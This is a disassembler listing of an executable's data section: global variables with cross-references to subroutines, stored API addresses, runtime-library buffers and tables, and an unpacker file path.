dword_4CBA30 dd 77D4702Fh ; DATA XREF: sub_409909+158�w
; sub_409909+1AD�r ...
dword_4CBA34 dd 77E6C0E3h ; DATA XREF: sub_409909+8C�w
; sub_409909+E2�r ...
dword_4CBA38 dd 71AB1ED3h ; DATA XREF: sub_409909+610�w
; sub_409909+764�r ...
dword_4CBA3C dd 71B2A381h ; DATA XREF: sub_409909+B43�w
; sub_409909+B5F�r
dword_4CBA40 dd 77DDA595h ; DATA XREF: sub_409909+33A�w
; sub_419B9E+55�r
dword_4CBA44 dd 77DD22EAh ; DATA XREF: sub_409909+27E�w
; sub_409909+2D3�r ...
dword_4CBA48 dd 773F97B0h ; DATA XREF: sub_409909+BAA�w
dword_4CBA4C dd 76D67A29h ; DATA XREF: sub_409909+AEC�w
; sub_40A928+CE�r
dword_4CBA50 dd 76D674FAh ; DATA XREF: sub_409909+ADF�w
; sub_409909+AE6�r ...
dword_4CBA54 dd 71AB3C22h ; DATA XREF: sub_4017ED+A6�r
; sub_401ACD+5052�r ...
dword_4CBA58 dd 71AB2BBFh ; DATA XREF: sub_401ACD+5044�r
; sub_401ACD+77D6�r ...
dword_4CBA5C dd 1F7BA3A9h ; DATA XREF: sub_409909+BF4�w
; sub_409909+C2F�r
dword_4CBA60 dd 71AB401Ch ; DATA XREF: sub_401ACD+1DF4�r
; sub_401ACD+5A1F�r ...
dword_4CBA64 dd 71C214BAh ; DATA XREF: sub_409909+9B1�w
; sub_409909+A2B�r ...
dword_4CBA68 dd 71AB868Dh ; DATA XREF: sub_409909+65E�w
; sub_409909+794�r ...
dword_4CBA6C dd 71AB1A6Dh ; DATA XREF: sub_40111D+12�r
; sub_4017ED+D0�r ...
dword_4CBA70 dd 71AB155Ah ; DATA XREF: sub_409909+59B�w
; sub_409909+70C�r ...
dword_4CBA74 dd 71B22C25h ; DATA XREF: sub_409909+B36�w
; sub_409909+B57�r ...
dword_4CBA78 dd 71AB5A01h ; DATA XREF: sub_409909+540�w
; sub_409909+6C4�r ...
dword_4CBA7C dd 71B2ACCBh ; DATA XREF: sub_409909+B29�w
; sub_409909+B4A�r
dword_4CBA80 dd 77E78C17h ; DATA XREF: WinMain(x,x,x,x)+52�r
; sub_409909+31�w ...
dword_4CBA84 dd 77D49A11h ; DATA XREF: sub_409909+17F�w
; sub_409909+1CA�r
dd 0
dword_4CBA8C dd 76D62A37h ; DATA XREF: sub_409909+927�w
; sub_409909+93B�r ...
dword_4CBA90 dd 77E6CBF9h ; DATA XREF: sub_409909+99�w
; sub_409909+EA�r ...
dword_4CBA94 dd 0 ; DATA XREF: sub_409909:loc_409A07�w
; sub_409909+12B�w ...
dword_4CBA98 dd 0 ; DATA XREF: sub_409909+126�w
; sub_40A5C5+1C�r
dword_4CBA9C dd 0 ; DATA XREF: sub_409909:loc_409AF7�w
; sub_409909:loc_409B5E�w ...
dword_4CBAA0 dd 0 ; DATA XREF: sub_409909+250�w
; sub_40A5C5+50�r
dword_4CBAA4 dd 0 ; DATA XREF: WinMain(x,x,x,x)+349�r
; sub_401ACD+4468�r ...
dword_4CBAA8 dd 0 ; DATA XREF: sub_409909+41E�w
; sub_40A5C5+84�r
dword_4CBAAC dd 0 ; DATA XREF: sub_409909:loc_409E0D�w
; sub_40A5C5:loc_40A675�r
dword_4CBAB0 dd 0 ; DATA XREF: sub_409909+4FF�w
; sub_40A5C5+B8�r
dword_4CBAB4 dd 0 ; DATA XREF: sub_409909:loc_40A0DE�w
; sub_40A5C5:loc_40A6A9�r
dword_4CBAB8 dd 0 ; DATA XREF: sub_409909+7D0�w
; sub_40A5C5+EC�r
dword_4CBABC dd 0 ; DATA XREF: sub_409909:loc_40A1C9�w
; sub_409909+8EF�w ...
dword_4CBAC0 dd 0 ; DATA XREF: sub_409909+8EA�w
; sub_40A5C5+120�r
dword_4CBAC4 dd 0 ; DATA XREF: sub_401ACD:loc_406E35�r
; sub_409909:loc_40A25D�w ...
dword_4CBAC8 dd 0 ; DATA XREF: sub_409909+94F�w
; sub_40A5C5+154�r
dword_4CBACC dd 0 ; DATA XREF: sub_401ACD+4470�r
; sub_409909:loc_40A379�w ...
dword_4CBAD0 dd 0 ; DATA XREF: sub_409909+A6B�w
; sub_40A5C5+188�r
dword_4CBAD4 dd 0 ; DATA XREF: sub_409909:loc_40A3C3�w
; sub_40A5C5:loc_40A779�r
dword_4CBAD8 dd 0 ; DATA XREF: sub_409909+AB5�w
; sub_40A5C5+1BC�r
dword_4CBADC dd 0 ; DATA XREF: sub_409909:loc_40A40D�w
; sub_40A5C5:loc_40A7AD�r
dword_4CBAE0 dd 0 ; DATA XREF: sub_409909+AFF�w
; sub_40A5C5+1F0�r
dword_4CBAE4 dd 0 ; DATA XREF: sub_409909:loc_40A481�w
; sub_40A5C5:loc_40A7E1�r
dword_4CBAE8 dd 0 ; DATA XREF: sub_409909+B73�w
; sub_40A5C5+224�r
dword_4CBAEC dd 0 ; DATA XREF: sub_409909:loc_40A4CB�w
; sub_40A5C5:loc_40A815�r
dword_4CBAF0 dd 0 ; DATA XREF: sub_409909+BBD�w
; sub_40A5C5+258�r
dword_4CBAF4 dd 0 ; DATA XREF: sub_409909:loc_40A569�w
; sub_40A5C5:loc_40A849�r
dword_4CBAF8 dd 0 ; DATA XREF: sub_409909+C5B�w
; sub_40A5C5+28C�r
dword_4CBAFC dd 0 ; DATA XREF: sub_409909:loc_40A5B3�w
; sub_40A5C5:loc_40A87D�r
dword_4CBB00 dd 0 ; DATA XREF: sub_409909+CA5�w
; sub_40A5C5+2C0�r
; char byte_4CBB04[]
byte_4CBB04 db 14h dup(0) ; DATA XREF: sub_40AA06+32�o
byte_4CBB18 db 0 ; DATA XREF: sub_40B2B3+6A�r
; sub_40B2B3+98�w
align 10h
dword_4CBB20 dd 0 ; DATA XREF: sub_40BD1A+18�r
; sub_40C2AF+92�w ...
dword_4CBB24 dd 0 ; DATA XREF: sub_40C3E8+4D�r
; sub_40C600+D9�w ...
dd 7FEh dup(0)
dword_4CDB20 dd 6 dup(0) ; DATA XREF: sub_40C3E8+D2�o
; sub_40C3E8+13B�o ...
dword_4CDB38 dd 0 ; DATA XREF: sub_40BD91+2C4�w
; sub_40BD91+348�o
dword_4CDB3C dd 0 ; DATA XREF: sub_40BD91+33E�w
; sub_40BD91+35A�r
dword_4CDB40 dd 0 ; DATA XREF: sub_40BD91+2CF�w
dword_4CDB44 dd 0 ; DATA XREF: sub_40BD91+2B9�w
; sub_40BD91:loc_40C0A6�r
; char byte_4CDB48[]
byte_4CDB48 db 80h dup(0) ; DATA XREF: sub_40BD91+2E2�o
; sub_40BD91+302�o
dword_4CDBC8 dd 0 ; DATA XREF: sub_40BD91+2D5�w
dword_4CDBCC dd 0 ; DATA XREF: sub_40BD91+2EF�w
; sub_40BD91+30F�w
dword_4CDBD0 dd 0 ; DATA XREF: sub_40BD91:loc_40C101�r
align 8
dword_4CDBD8 dd 0 ; DATA XREF: sub_40BD91+82�w
; sub_40BD91+101�o
dword_4CDBDC dd 41h dup(0) ; DATA XREF: sub_40BD91+41�o
; char byte_4CDCE0[]
byte_4CDCE0 db 104h dup(0) ; DATA XREF: sub_40BD91+69�o
dword_4CDDE4 dd 0 ; DATA XREF: sub_40BD91+F7�w
; sub_40BD91+113�r
dword_4CDDE8 dd 0 ; DATA XREF: sub_40BD91+52�w
dword_4CDDEC dd 0 ; DATA XREF: sub_40BD91+4D�w
; sub_40BD91+D4�r
; char byte_4CDDF0[]
byte_4CDDF0 db 80h dup(0) ; DATA XREF: sub_40BD91+9A�o
; sub_40BD91+BA�o
dword_4CDE70 dd 0 ; DATA XREF: sub_40BD91+8F�w
dword_4CDE74 dd 0 ; DATA XREF: sub_40BD91+A7�w
; sub_40BD91+C7�w
dword_4CDE78 dd 0 ; DATA XREF: sub_40BD91:loc_40BEBA�r
align 10h
dword_4CDE80 dd 0 ; DATA XREF: sub_40BD91+1A5�w
; sub_40BD91+225�o
dword_4CDE84 dd 41h dup(0) ; DATA XREF: sub_40BD91+167�o
; char byte_4CDF88[]
byte_4CDF88 db 104h dup(0) ; DATA XREF: sub_40BD91+18C�o
dword_4CE08C dd 0 ; DATA XREF: sub_40BD91+21B�w
; sub_40BD91+237�r
dword_4CE090 dd 0 ; DATA XREF: sub_40BD91+17A�w
dword_4CE094 dd 0 ; DATA XREF: sub_40BD91+175�w
; sub_40BD91+1F8�r
; char byte_4CE098[]
byte_4CE098 db 80h dup(0) ; DATA XREF: sub_40BD91+1BE�o
; sub_40BD91+1DE�o
dword_4CE118 dd 0 ; DATA XREF: sub_40BD91+1B1�w
dword_4CE11C dd 0 ; DATA XREF: sub_40BD91+1CB�w
; sub_40BD91+1EB�w
dword_4CE120 dd 0 ; DATA XREF: sub_40BD91:loc_40BFDE�r
align 8
dword_4CE128 dd 0 ; DATA XREF: sub_40BD91+417�w
; sub_40BD91+470�o
; char byte_4CE12C[]
byte_4CE12C db 288h dup(0) ; DATA XREF: sub_40BD91+405�o
; char byte_4CE3B4[]
byte_4CE3B4 db 104h dup(0) ; DATA XREF: sub_40BD91+3CF�o
dword_4CE4B8 dd 0 ; DATA XREF: sub_40BD91+3FC�w
; sub_40BD91+423�r
align 10h
dword_4CE4C0 dd 0 ; DATA XREF: sub_40BD91+466�w
; sub_40BD91+482�r
dword_4CE4C4 dd 0 ; DATA XREF: sub_40BD91+429�w
dword_4CE4C8 dd 0 ; DATA XREF: sub_40BD91+436�w
dword_4CE4CC dd 0 ; DATA XREF: sub_40BD91+3F6�w
dd 0
dword_4CE4D4 dd 0 ; DATA XREF: sub_40BD91:loc_40C229�r
dd 0
dword_4CE4DC dd 0 ; DATA XREF: sub_40B9DD+E�r
; sub_40B9DD+32�r ...
dword_4CE4E0 dd 0 ; DATA XREF: sub_40B9DD+9�r
; sub_40B9DD+26�r ...
; char byte_4CE4E4[]
byte_4CE4E4 db 208h dup(0) ; DATA XREF: sub_40C85F+8D�o
dword_4CE6EC dd 2 dup(0) ; DATA XREF: sub_40D1C8+68�o
dword_4CE6F4 dd 0 ; DATA XREF: sub_40DB5E+9E�o
dword_4CE6F8 dd 0 ; DATA XREF: sub_40EED1+1F�r
; sub_40EF1C+BC�o ...
dword_4CE6FC dd 0 ; DATA XREF: sub_40EF1C+B7�o
; sub_40EF1C+DA�r ...
dword_4CE700 dd 0 ; DATA XREF: sub_40EF1C+9A�o
; sub_40EF1C+CF�r ...
dword_4CE704 dd 0 ; DATA XREF: sub_40EE8E+35�r
; sub_40EF1C+95�o ...
dword_4CE708 dd 0 ; DATA XREF: sub_40EE8E+17�r
; sub_40EED1+3D�r ...
align 10h
dword_4CE710 dd 409h ; DATA XREF: sub_40BD91+2AE�r
; sub_40F0F1+10�w ...
align 8
dword_4CE718 dd 0 ; DATA XREF: sub_40BA49+1C�r
; sub_40F108+27C�w
dword_4CE71C dd 0 ; DATA XREF: sub_40F9BF+2A�w
; sub_40F9BF+51�r ...
dd 3 dup(0)
dword_4CE72C dd 0 ; DATA XREF: sub_4111C0+146�r
dd 0
dword_4CE734 dd 0 ; DATA XREF: sub_412EDD+4�w
; sub_412EDD+9�o
align 10h
byte_4CE740 db 0 ; DATA XREF: sub_413A29+1D3�w
; sub_413A29+2D2�o
align 2
word_4CE742 dw 0 ; DATA XREF: sub_413A29+1E3�w
word_4CE744 dw 0 ; DATA XREF: sub_413A29+1E9�w
word_4CE746 dw 0 ; DATA XREF: sub_413A29+1F0�w
byte_4CE748 db 0 ; DATA XREF: sub_413A29+1F7�w
byte_4CE749 db 0 ; DATA XREF: sub_413A29+1FE�w
word_4CE74A dw 0 ; DATA XREF: sub_413A29+204�w
dword_4CE74C dd 0 ; DATA XREF: sub_413A29+234�w
; sub_413A29+250�w
dword_4CE750 dd 0 ; DATA XREF: sub_413A29+258�w
byte_4CE754 db 0 ; DATA XREF: sub_413A29+26A�w
byte_4CE755 db 0 ; DATA XREF: sub_413A29+27D�w
word_4CE756 dw 0 ; DATA XREF: sub_413A29+295�w
word_4CE758 dw 0 ; DATA XREF: sub_413A29+2A4�w
word_4CE75A dw 0 ; DATA XREF: sub_413A29+29C�w
dword_4CE75C dd 101h dup(0) ; DATA XREF: sub_413A29+2B9�o
; char byte_4CEB60[]
byte_4CEB60 db 200h dup(0) ; DATA XREF: sub_401ACD+2F25�o
; sub_401ACD:loc_404A7B�o ...
byte_4CED60 db 0 ; DATA XREF: sub_4152D1+1A1�w
; sub_4152D1+27A�o
align 2
word_4CED62 dw 0 ; DATA XREF: sub_4152D1+1AE�w
word_4CED64 dw 0 ; DATA XREF: sub_4152D1+1B8�w
word_4CED66 dw 0 ; DATA XREF: sub_4152D1+1C1�w
byte_4CED68 db 0 ; DATA XREF: sub_4152D1+1C8�w
byte_4CED69 db 0 ; DATA XREF: sub_4152D1+1CF�w
word_4CED6A dw 0 ; DATA XREF: sub_4152D1+1D6�w
dword_4CED6C dd 0 ; DATA XREF: sub_4152D1+1E3�w
dword_4CED70 dd 0 ; DATA XREF: sub_4152D1+1EB�w
word_4CED74 dw 0 ; DATA XREF: sub_4152D1+244�w
word_4CED76 dw 0 ; DATA XREF: sub_4152D1+22C�w
word_4CED78 dw 0 ; DATA XREF: sub_4152D1+256�w
word_4CED7A dw 0 ; DATA XREF: sub_4152D1+1F7�w
dword_4CED7C dd 101h dup(0) ; DATA XREF: sub_4152D1+265�o
dword_4CF180 dd 0 ; DATA XREF: sub_401ACD+19C3�w
; sub_401ACD+2F1D�r ...
align 10h
byte_4CF190 db 0 ; DATA XREF: sub_4157BA+241�o
; sub_4157BA+250�w ...
byte_4CF191 db 0 ; DATA XREF: sub_4157BA+264�w
word_4CF192 dw 0 ; DATA XREF: sub_4157BA+295�w
word_4CF194 dw 0 ; DATA XREF: sub_4157BA+27C�w
; sub_4157BA:loc_415B8C�w
word_4CF196 dw 0 ; DATA XREF: sub_4157BA+29B�w
byte_4CF198 db 0 ; DATA XREF: sub_4157BA+288�w
byte_4CF199 db 0 ; DATA XREF: sub_4157BA+25D�w
word_4CF19A dw 0 ; DATA XREF: sub_4157BA+3F2�w
; sub_4157BA+41C�w
dword_4CF19C dd 0 ; DATA XREF: sub_4157BA:loc_415A83�w
; sub_4157BA+39A�r
dword_4CF1A0 dd 0 ; DATA XREF: sub_4157BA+2D6�w
word_4CF1A4 dw 0 ; DATA XREF: sub_4157BA+394�w
; sub_4157BA+3E8�o
word_4CF1A6 dw 0 ; DATA XREF: sub_4157BA+335�w
; sub_4157BA+35A�r ...
dword_4CF1A8 dd 0 ; DATA XREF: sub_4157BA+30C�w
; sub_4157BA+3D9�w
dword_4CF1AC dd 0 ; DATA XREF: sub_4157BA+328�w
; sub_4157BA+3AB�w ...
byte_4CF1B0 db 0 ; DATA XREF: sub_4157BA+311�r
; sub_4157BA+31F�w
byte_4CF1B1 db 0 ; DATA XREF: sub_4157BA+2DB�w
; sub_4157BA+3A4�w ...
word_4CF1B2 dw 0 ; DATA XREF: sub_4157BA+2E9�w
word_4CF1B4 dw 0 ; DATA XREF: sub_4157BA+3F9�w
; sub_4157BA+42A�w
word_4CF1B6 dw 0 ; DATA XREF: sub_4157BA+32E�w
word_4CF1B8 dw 0 ; DATA XREF: sub_4157BA+360�w
; sub_4157BA+432�o
word_4CF1BA dw 0 ; DATA XREF: sub_4157BA+36F�w
; sub_4157BA+409�w
dword_4CF1BC dd 0 ; DATA XREF: sub_4157BA+369�w
dd 2 dup(0)
dword_4CF1C8 dd 0 ; DATA XREF: sub_4157BA+39F�w
; sub_4157BA+417�o
dword_4CF1CC dd 0 ; DATA XREF: sub_4157BA+33B�w
byte_4CF1D0 db 0 ; DATA XREF: sub_4157BA+341�w
byte_4CF1D1 db 0 ; DATA XREF: sub_4157BA+347�w
word_4CF1D2 dw 0 ; DATA XREF: sub_4157BA+354�w
dword_4CF1D4 dd 7 dup(0) ; DATA XREF: sub_4157BA+3ED�o
dword_4CF1F0 dd 0 ; DATA XREF: sub_4157BA+30�w
; sub_4157BA+43B�r
; char byte_4CF1F4[]
byte_4CF1F4 db 400h dup(0) ; DATA XREF: sub_4157BA+1C3�o
; sub_4157BA+47E�o
; char byte_4CF5F4[]
byte_4CF5F4 db 4000h dup(0) ; DATA XREF: sub_415D38+1D�o
; sub_415DD8�o ...
; char byte_4D35F4[]
byte_4D35F4 db 4 dup(0) ; DATA XREF: sub_415D38+13�o
; sub_415DD8+E�o ...
dword_4D35F8 dd 0Eh dup(0) ; DATA XREF: sub_416CC9+F�o
; char byte_4D3630[]
byte_4D3630 db 200h dup(0) ; DATA XREF: sub_417990+41�o
; wchar_t word_4D3830
word_4D3830 dw 0 ; DATA XREF: sub_4172C1+C7�o
; sub_41761C+DD�o ...
align 4
dd 1FFh dup(0)
; wchar_t word_4D4030
word_4D4030 dw 0 ; DATA XREF: sub_4172C1+D6�o
; sub_41761C+F4�o ...
align 4
dd 47h dup(0)
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: .data:off_4383A8�o
dd 1B7h dup(0)
dword_4D4830 dd 0 ; DATA XREF: sub_4172C1+86�w
; sub_417493+94�r
dword_4D4834 dd 0 ; DATA XREF: sub_4172C1+A7�w
; sub_4178F9+55�r ...
dword_4D4838 dd 0 ; DATA XREF: sub_4172C1+A0�w
; sub_417493+D6�r ...
dword_4D483C dd 0 ; DATA XREF: sub_4172C1+79�w
; sub_417493+35�r ...
; char byte_4D4840[]
byte_4D4840 db 200h dup(0) ; DATA XREF: sub_4178F9+5E�o
dword_4D4A40 dd 0 ; DATA XREF: sub_4172C1+93�w
; sub_417493+A2�r
align 8
dword_4D4A48 dd 0 ; DATA XREF: sub_4172C1+E7�o
; sub_4172C1+103�r ...
dword_4D4A4C dd 0 ; DATA XREF: sub_41761C+17B�w
; sub_4177C3+107�w
; void *Src
Src dd 0 ; DATA XREF: sub_41761C+180�w
; sub_4177C3+10D�w ...
dword_4D4A54 dd 0 ; DATA XREF: sub_41761C+159�w
; sub_4178F9+4F�r
dword_4D4A58 dd 0 ; DATA XREF: sub_417C61+22�w
; sub_417C61:loc_417DE6�w ...
dword_4D4A5C dd 0 ; DATA XREF: sub_401ACD+3C95�o
; sub_417B2F+12�o ...
dd 0
dword_4D4A64 dd 0 ; DATA XREF: sub_417C61+1C�r
; sub_417E06+3A�r
dd 7Fh dup(0)
dword_4D4C64 dd 0 ; DATA XREF: sub_417C61+28�r
; sub_417E06+4A�w
dd 1944h dup(0)
dword_4DB178 dd 0 ; DATA XREF: sub_417E06+23�o
; char byte_4DB17C[]
byte_4DB17C db 204h dup(0) ; DATA XREF: sub_401ACD+3CB9�o
; sub_417B2F+3C�o ...
; char byte_4DB380[]
byte_4DB380 db 5Ch dup(0) ; DATA XREF: sub_418D2A:loc_418E47�o
; sub_418D2A+131�o ...
; char byte_4DB3DC[]
byte_4DB3DC db 200h dup(0) ; DATA XREF: sub_419AE0+7C�o
; sub_419AE0+A5�o
dword_4DB5DC dd 0 ; DATA XREF: sub_4190A5+45�w
; sub_4190A5+4D�r ...
; char byte_4DB5E0[]
byte_4DB5E0 db 5Ch dup(0) ; DATA XREF: sub_4199AC:loc_419ACE�o
; sub_4199AC+12D�o
; char byte_4DB63C[]
byte_4DB63C db 200h dup(0) ; DATA XREF: sub_418FE5+4C�o
; sub_418FE5+7E�o ...
byte_4DB83C db 0 ; DATA XREF: sub_4190A5+29�r
; sub_4190A5+34�w
align 10h
; char byte_4DB840[]
byte_4DB840 db 200h dup(0) ; DATA XREF: sub_4192FC+61�o
; sub_4192FC+89�o ...
; char byte_4DBA40[]
byte_4DBA40 db 204h dup(0) ; DATA XREF: sub_418C0E:loc_418C46�o
; sub_418C0E+5B�o
dword_4DBC44 dd 0 ; DATA XREF: sub_419F6D:loc_419F8E�r
; sub_41A05C+54�r ...
dword_4DBC48 dd 0 ; DATA XREF: sub_419F6D�r
; sub_41A05C+37�r ...
dword_4DBC4C dd 0 ; DATA XREF: sub_419F9D+1A�r
; sub_41A1B1+83�o
dword_4DBC50 dd 0 ; DATA XREF: sub_419F6D:loc_419F81�r
; sub_41A1B1+11B�w
; char byte_4DBC54[]
byte_4DBC54 db 34h dup(0) ; DATA XREF: sub_41A05C+13�o
; sub_41A1B1:loc_41A2EE�o
; int dword_4DBC88
dword_4DBC88 dd 0 ; DATA XREF: sub_41A05C+CD�r
; sub_41A05C+EC�r ...
align 10h
; char byte_4DBC90[]
byte_4DBC90 db 3Ch dup(0) ; DATA XREF: sub_41ADD8+47�o
; char byte_4DBCCC
byte_4DBCCC db 0 ; DATA XREF: sub_41B52C+6�o
; .text:0041B881�o ...
align 10h
dd 3Fh dup(0)
dword_4DBDCC dd 2 dup(0) ; DATA XREF: sub_41B55B+18�o
dword_4DBDD4 dd 2 dup(0) ; DATA XREF: sub_41B55B+8�o
; .text:0041B6CA�o
dword_4DBDDC dd 0 ; DATA XREF: _strtoxl+1B9�w
; _fseek:loc_41DB07�w ...
dword_4DBDE0 dd 0 ; DATA XREF: sub_41DC5E+35�w
; __close:loc_41E3AC�w ...
dword_4DBDE4 dd 0 ; DATA XREF: __sopen+13A�r
dword_4DBDE8 dd 0A28h ; DATA XREF: start+52�w
dword_4DBDEC dd 501h ; DATA XREF: start+49�w
dword_4DBDF0 dd 5 ; DATA XREF: start+3E�w
dword_4DBDF4 dd 1 ; DATA XREF: start+30�w
dword_4DBDF8 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_401516�r
; __setargv+91�w
dword_4DBDFC dd 340B20h ; DATA XREF: WinMain(x,x,x,x)+2FE�r
; WinMain(x,x,x,x)+31E�r ...
dd 0
dword_4DBE04 dd 340B48h ; DATA XREF: __setenvp+44�w
dd 3 dup(0)
off_4DBE14 dd offset aCM_unpackerPac ; DATA XREF: __setargv+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4DBE1C db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 10h
dword_4DBE20 dd 0 ; DATA XREF: _doexit+27�w
dword_4DBE24 dd 0 ; DATA XREF: _doexit+4�r _doexit+8B�w
dword_4DBE28 dd 0 ; DATA XREF: _strtok+3B�r _strtok+91�w
align 10h
dword_4DBE30 dd 0 ; DATA XREF: __fpmath+A�w
; char *dword_4DBE34
dword_4DBE34 dd 0 ; DATA XREF: start+84�w
; __setenvp:loc_4236E5�r ...
dd 0
dword_4DBE3C dd 0 ; DATA XREF: __amsg_exit�r
; _fast_error_exit�r ...
dword_4DBE40 dd 0 ; DATA XREF: sub_41F3B0+4B�w
; sub_41F4C9+2D�w ...
dword_4DBE44 dd 0 ; DATA XREF: __callnewh�r
dword_4DBE48 dd 0 ; DATA XREF: sub_41BBE2:loc_41BCFE�r
; sub_41BBE2:loc_41BE1F�r ...
dword_4DBE4C dd 1 ; DATA XREF: __setmbcp:loc_4208C4�r
; _getSystemCP+4�w ...
dword_4DBE50 dd 0 ; DATA XREF: __stbuf+37�r
align 8
dword_4DBE58 dd 0 ; DATA XREF: __cftoe+11�r __cftof+1A�r ...
byte_4DBE5C db 0 ; DATA XREF: __cftoe+3�r __cftoe+98�r ...
align 10h
dword_4DBE60 dd 0 ; DATA XREF: __cftof+11�r __cftog+21�w ...
byte_4DBE64 db 0 ; DATA XREF: __cftog+51�w
align 4
dword_4DBE68 dd 0 ; DATA XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+4E�r
; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+3A�r ...
dword_4DBE6C dd 0 ; DATA XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+5C�r
; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+43�r ...
dword_4DBE70 dd 0 ; DATA XREF: _CallSETranslator(EHExceptionRecord *,EHRegistrationNode *,void *,void *,_s_FuncInfo const *,int,EHRegistrationNode *)+7A�r
; FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *)+5�r
dword_4DBE74 dd 0 ; DATA XREF: sub_422DFC+29�r
dword_4DBE78 dd 1 ; DATA XREF: ___crtLCMapStringA+28�r
; ___crtLCMapStringA+4C�w ...
dd 2 dup(0)
; int dword_4DBE84
dword_4DBE84 dd 0 ; DATA XREF: __strupr+4�r __strupr+6E�r ...
dd 3 dup(0)
dword_4DBE94 dd 0 ; DATA XREF: _mbstowcs+61�r
; _mbstowcs+BF�r ...
dd 0
dword_4DBE9C dd 0 ; DATA XREF: __XcptFilter+3A�r
; __XcptFilter+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv:loc_4237A3�o
; .data:off_4DBE14�o
align 4
dd 3Ah dup(0)
dword_4DBFA4 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+23�w ...
dword_4DBFA8 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_4DBFAC dd 0 ; DATA XREF: __openfile+154�w
; __stbuf:loc_420D0F�w ...
dword_4DBFB0 dd 0 ; DATA XREF: __openfile+7�r
dword_4DBFB4 dd 1 ; DATA XREF: ___crtGetStringTypeA+26�r
; ___crtGetStringTypeA:loc_42455E�w
word_4DBFB8 dw 0 ; DATA XREF: __fltout+1A�o __fltout+46�r
byte_4DBFBA db 0 ; DATA XREF: __fltout+39�r
align 4
dword_4DBFBC dd 7 dup(0) ; DATA XREF: __fltout+52�o
dword_4DBFD8 dd 0 ; DATA XREF: __fltout+40�w __fltout+5C�o
dword_4DBFDC dd 0 ; DATA XREF: __fltout+4D�w
dword_4DBFE0 dd 0 ; DATA XREF: __fltout+31�w
dword_4DBFE4 dd 0 ; DATA XREF: __fltout+52�w
; int (__stdcall *dword_4DBFE8)()
dword_4DBFE8 dd 77C26E79h ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):loc_424F3F�r
; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+38�r ...
dword_4DBFEC dd 0 ; DATA XREF: ___crtMessageBoxA+3�r
; ___crtMessageBoxA+2E�w ...
dword_4DBFF0 dd 0 ; DATA XREF: ___crtMessageBoxA+43�w
; ___crtMessageBoxA:loc_425078�r
dword_4DBFF4 dd 0 ; DATA XREF: ___crtMessageBoxA+4A�w
; ___crtMessageBoxA+60�r
dword_4DBFF8 dd 0 ; DATA XREF: __sopen+3F�r
dword_4DBFFC dd 0 ; DATA XREF: _raise:loc_425C6D�r
; _raise+6D�o
dword_4DC000 dd 0 ; DATA XREF: _raise:loc_425C44�r
; _raise+44�o
dword_4DC004 dd 0 ; DATA XREF: _raise:loc_425C37�r
; _raise+37�o
dword_4DC008 dd 0 ; DATA XREF: _raise:loc_425C51�r
; _raise+51�o
align 10h
dword_4DC010 dd 0 ; DATA XREF: ___crtLCMapStringW+28�r
; ___crtLCMapStringW+4C�w ...
dword_4DC014 dd 0 ; DATA XREF: ___crtGetStringTypeW+26�r
; ___crtGetStringTypeW:loc_42692B�w
byte_4DC018 db 1 ; DATA XREF: unknown_libname_1�r
; unknown_libname_1+9�w
align 4
dword_4DC01C dd 341110h ; DATA XREF: _flsall:loc_41E4A1�r
; __getstream+14�r ...
dword_4DC020 dd 400h dup(0) ; DATA XREF: .data:off_43D568�o
; .data:0043D570�o
; size_t Size
Size dd 200h ; DATA XREF: _flsall+9�r _flsall+56�r ...
dd 7 dup(0)
dword_4DD040 dd 340650h ; DATA XREF: __filbuf+75�r __read+2A�r ...
dword_4DD044 dd 3Fh dup(0) ; DATA XREF: __ioinit+92�o
dword_4DD140 dd 20h ; DATA XREF: __close+8�r __read+C�r ...
dword_4DD144 dd 4E4h ; DATA XREF: __setmbcp+14�r
; __setmbcp+65�w ...
align 10h
dword_4DD150 dd 3 dup(0) ; DATA XREF: __setmbcp+123�o
; __setmbcp+171�o ...
dword_4DD15C dd 0 ; DATA XREF: __setmbcp+108�w
; __setmbcp+15D�w ...
byte_4DD160 db 0 ; DATA XREF: _setSBUpLow:loc_420A94�w
; _setSBUpLow:loc_420AB1�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4DD260 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_4DD261 db 0 ; DATA XREF: __splitpath+5D�r
; __setmbcp+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
